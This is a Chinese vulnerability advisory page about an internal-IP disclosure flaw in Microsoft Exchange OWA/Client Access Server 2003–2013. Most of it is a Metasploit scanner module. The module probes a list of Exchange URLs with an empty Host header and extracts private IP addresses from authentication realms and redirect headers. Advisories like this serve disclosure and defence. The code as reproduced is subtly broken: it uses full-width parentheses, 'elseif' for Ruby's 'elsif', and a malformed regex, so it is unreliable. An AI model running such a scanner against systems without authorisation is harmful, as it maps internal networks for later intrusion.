首页 / 操作系统 / Linux / Microsoft Exchange 多个信息泄露漏洞

发布日期：2014-08-01
更新日期：2014-08-05受影响系统：
Microsoft Exchange Server 2013
 Microsoft Exchange Server 2010
 Microsoft Exchange Server 2007
 Microsoft Exchange Server 2003
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 69018
 
Microsoft Exchange Server是微软公司的一套电子邮件服务组件。
 
Outlook Web App （OWA）/Client Access Server （CAS）在实现上存在IIS HTTP头文件路径IP信息泄露漏洞，攻击者可利用此漏洞获取敏感信息。
 
<*来源：Nate Power
 *>测试方法：
--------------------------------------------------------------------------------警 告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
require "msf/core"
 
class Metasploit3 < Msf::Auxiliary
 
include Msf::Exploit::Remote::HttpClient
 include Msf::Auxiliary::Scanner
 
def initialize
   super（
     "Name"         => "Outlook Web App （OWA） / Client Access Server （CAS） IIS HTTP Internal IP Disclosure",
     "Description"    => %q{
       This module tests vulnerable IIS HTTP header file paths on Microsoft Exchange OWA 2003, CAS 2007, 2010, 2013
servers.
     },
     "Author"       =>
       [
         "Nate Power"
       ],
     "DisclosureDate" => "Dec 17 2012",
     "License"        => MSF_LICENSE,
     "DefaultOptions" => {
       "SSL" => true
     }
   ）
 
 register_options（
        [
       OptInt.new（"TIMEOUT", [ true, "HTTP connection timeout", 10]）,
       OptInt.new（"RPORT", [ true, "The target port", 443]）,
        ], self.class）
 end
 
  def run_host（target_host）
    rhost = target_host
    print_status（"#{msg} Checking HTTP headers"）
    get_ip_extract
 end
 
  def get_ip_extract
   urls = ["/Microsoft-Server-ActiveSync/default.eas",
     "/Microsoft-Server-ActiveSync",
     "/Autodiscover/Autodiscover.xml",
     "/Autodiscover",
     "/Exchange",
     "/Rpc",
     "/EWS/Exchange.asmx",
     "/EWS/Services.wsdl",
     "/EWS",
     "/ecp",
     "/OAB",
     "/OWA",
     "/aspnet_client",
     "/PowerShell"]
 
    result = nil
 
    urls.each do |url|
     begin
       res = send_request_cgi（{
         "version" => "1.0",
         "uri"      => "#{url}",
         "method" => "GET",
         "vhost"  =>  ""
       }, timeout = datastore["TIMEOUT"]）
     
     rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
       print_error（"#{msg} HTTP Connection Failed"）
       next
     end
 
      if not res
       print_error（"#{msg} HTTP Connection Timeout"）
       next
     end
 
      if res and res.code == 401 and （match = res["WWW-Authenticate"].match（/Basic
realm="（192.168.[0-9]{1,3}.[0-9]{1,3}|10.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}|172.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}）"/i））
       result = match.captures[0]
       print_status（"#{msg} Status Code: 401 response"）
       print_status（"#{msg} Found Path: " + url ）
       print_good（"#{msg} Found target internal IP address: " + result）
       return result
        elseif
       print_warning（"#{msg} No internal address found"）
       next
     end
 
      if res and （res.code > 300 and res.code < 310） and （match =
res["Location"].match（/^http[s]://（192.168.[0-9]{1,3}.[0-9]{1,3}|10.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}|172.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}）//i））
       result = match.captures[0]
       print_status（"#{msg} Status Code: #{res.code} response"）
       print_status（"#{msg} Found Path: " + url ）
       print_good（"#{msg} Found target internal IP address: " + result）
       return result
        elseif
       print_warning（"#{msg} No internal address found"）
       next
     end
   end
 
    if result.nil？
     print_warning（"#{msg} Nothing found"）
   end
 
    return result
 end
 def msg
   "#{rhost}:#{rport} -"
 end
 end建议：
--------------------------------------------------------------------------------
厂商补丁：
 
Microsoft
 ---------
 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
 
http://technet.microsoft.com/security/bulletin/